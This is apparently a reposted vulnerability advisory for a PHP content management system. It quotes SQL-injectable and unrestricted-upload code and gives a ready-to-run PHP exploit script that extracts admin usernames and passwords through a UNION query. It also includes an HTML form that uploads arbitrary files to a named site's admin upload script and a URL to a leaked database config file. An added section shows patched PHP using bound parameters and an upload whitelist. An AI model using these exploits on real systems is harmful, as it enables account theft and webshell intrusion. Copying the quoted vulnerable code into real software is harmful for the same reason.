Brief description:
// PageArt.php
// ...
$column = $_POST["column"];
$rownum = $_POST["rownum"];
$SQL = "select id,title,addtime from Maid where column_id=".$column;
// ... other similar files ...
Exp:
<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
 SQL injection Vul Exploit
 Exp: black guy cfking
 Home: www.2cto.com  www.webvul.com
 2011.09.20
+---------------------------------------------------------------------+
');
if ($argc < 2) {
    print_r('
Usage:   php '.$argv[0].' Host /path
Example: php '.$argv[0].' www.2cto.com test
');
    die();
}
ob_start();
$host = $argv[1];
$path = $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
// Request line as printed on the page; the table name and LIMIT values were not preserved by the source
fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31,1.1+from+maid+LIMIT+-- HTTP/\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n");
// Read response headers up to the blank line
$headers = "";
while ($str = trim(fgets($sock, 1024)))
    $headers .= "$str\n";
// Read the response body
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
// print_r($body);
// 0x63666B696E677339307365637E is "cfkings90sec~", 0x2D is "-", 0x7E31 is "~1": the markers the regex below looks for
if (strpos($body, 'cfkings90sec') !== false) {
    preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
    $result = explode("-", $arr[1]);
    print_r("Exploit Success!\nusername: ".$result[0]."\npassword: ".$result[1]."\n");
} else {
    print_r("Exploit Failed!\n");
}
File Upload:
Vulnerable files: admin/column/upload.php and admin/article/upload.php
// admin/article/upload.php
$upload_dir = '../../uploads/';
$file_path = $upload_dir.$_FILES['myfile']['name'];
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
......
if ($_FILES['myfile']['size'] > $MAX_SIZE)
    echo "the size of the uploaded file exceeds the specified size";
if ($_FILES['myfile']['size'] == 0)
    echo "select the uploaded file";
// Executed even after the checks above fail; the client-supplied file name is used unchanged
if (!move_uploaded_file($_FILES['myfile']['tmp_name'], $file_path))
    echo "failed to copy the file. please upload it again";
Neither file restricts the type or name of the uploaded file!
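Both defects quoted above, the concatenated $_POST["column"] in PageArt.php and the unchecked move_uploaded_file() in the two upload scripts, fixed in PHP. This is an added example, not the CMS's own code; it assumes a PDO handle, keeps the advisory's placeholder table name "Maid", and limits uploads to images because the page does not say what the upload is for.

```php
<?php
// Added example, not the CMS's code. Assumes a PDO connection; "Maid" is the
// advisory's placeholder for the article table, whose real name is not given.

// 1. PageArt.php: validate and bind column_id instead of concatenating it.
function fetchArticles(PDO $pdo, array $post): array {
    // column_id is numeric, so reject anything that is not an integer up front.
    $column = filter_var($post['column'] ?? '', FILTER_VALIDATE_INT);
    if ($column === false) {
        throw new InvalidArgumentException('column must be an integer');
    }
    $stmt = $pdo->prepare('SELECT id, title, addtime FROM Maid WHERE column_id = :col');
    $stmt->bindValue(':col', $column, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2. admin/*/upload.php: stop on error, whitelist the type, and never reuse
//    the client-supplied file name (it controls both extension and path).
function saveUpload(array $file, string $uploadDir, int $maxSize = 20000000): string {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or no file selected');
    }
    if ($file['size'] > $maxSize) {
        throw new RuntimeException('file exceeds the size limit');
    }
    // Extension whitelist (assumed: the page does not state allowed types).
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // Check the real content type; $file['type'] and the name are attacker-controlled.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen random name: no traversal, no attacker-chosen script name.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store the file');
    }
    return $dest;
}
```

The uploads directory should additionally be configured so the web server does not execute scripts from it, which the code alone cannot guarantee.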
Exp:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action="http://www.bkjia.com/admin/column/upload.php" method="post">
<p>The uploaded file is stored at site/uploads/filename</p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>
Information Leakage:
http://www.bkjia.com/admin/lib/db/config.xml